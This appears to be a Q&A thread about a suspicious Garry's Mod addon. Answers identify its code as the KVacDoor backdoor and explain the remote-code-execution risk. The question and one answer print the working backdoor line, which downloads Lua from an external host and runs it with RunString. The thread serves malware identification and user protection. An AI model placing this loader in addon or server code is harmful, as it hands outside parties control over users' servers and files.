# Is this glua code a malicious code or not?

Tags: lua, add-on, virus, garrys-mod

I received a *sus* version of a addon (gmod) and it has this inside:

```
timer.Simple(1, function() http.Fetch("https://kvac.cz/f.php?key=2SzqLfShfxnu81uPmMOi", function(b) RunString(b, ":", false) end)end)
```

and also another file in 'materials/npc/' called 'help.vtf' with the same code inside.

Could you help me to know if it is a backdoor or other malicious programm please ?

*(and I also added to total lua file: https://mega.nz/file/tLtnwC4Y#r5wqK-JRQPm3BZrA3x9FUIkzw5rjXgFq4HG8pf0yuMA)*

Comment: Maybe also include the code, as the provided URL only provides an empty file for me.

Comment: Please show your file `materials/npc/help.vtf` - the main malicious code is there

Answer (score 1, accepted):

The code is malicious, the code is a common backdoor called KVacDoor, it allows the developer to execute lua scripts, console commands and take control over your server files.

If you follow the base URL of the fetch request to https://kvac.cz you can learn more about this backdoor and how it functions.

I would recommend uninstalling the addon.

Answer (score 1):

We can't tell. Downloading & executing downloaded code is a clear remote code execution (RCE) vulnerability however. Perhaps this was intended as a purpose way of "protecting" the source (where the "key" would be a license key or similar) or as a way of providing easy updates we don't know.

The link is probably controlled by whoever distributes the script. It probably attempts to validate the key in PHP code and respond with the script if its valid; the key in your answer might be expired. You can't possibly know what this server does. Do you trust this server to always respond with a virus-free script? I wouldn't. It might send you malicious code only at halloween, the tenth of a month, midnight etc, only if the User-Agent is Garry's Mod (to mitigate basic attempts of viewing the script in a browser).

TL;DR: This is a RCE vulnerability. You must trust the server fully to trust the script.

Answer (score 0):

Whether it's malicious or not depends entirely on what you expect it to do. If you don't expect it to download some random file from the internet and run it as code, then yes, it's malicious.

I'm not familiar with this API, so I'll just guess what the functions do from their names:

```lua
timer.Simple(1, function() -- Some sort of timer to run the code after some delay
   -- Download a file from some URL
   http.Fetch("https://kvac.cz/f.php?key=2SzqLfShfxnu81uPmMOi", function(b)
      -- Probably a callback function that runs when the file from the given
      -- URL has finished downloading. The `b` parameter is probably the
      -- content of the downloaded file.
      RunString(b, ":", false) -- Going by the name: Takes a string (b) and runs it
                               -- like normal Lua code. No clue what the ":" does
   end)
end)
```

Opening the URL brings up nothing, but maybe the server is looking for some specific request headers to make sure you can't actually inspect the code.

If you really want to find out, you could try **at your own risk** to modify the code to display the downloaded code instead of running it, but that's probably not worth the danger of missing something.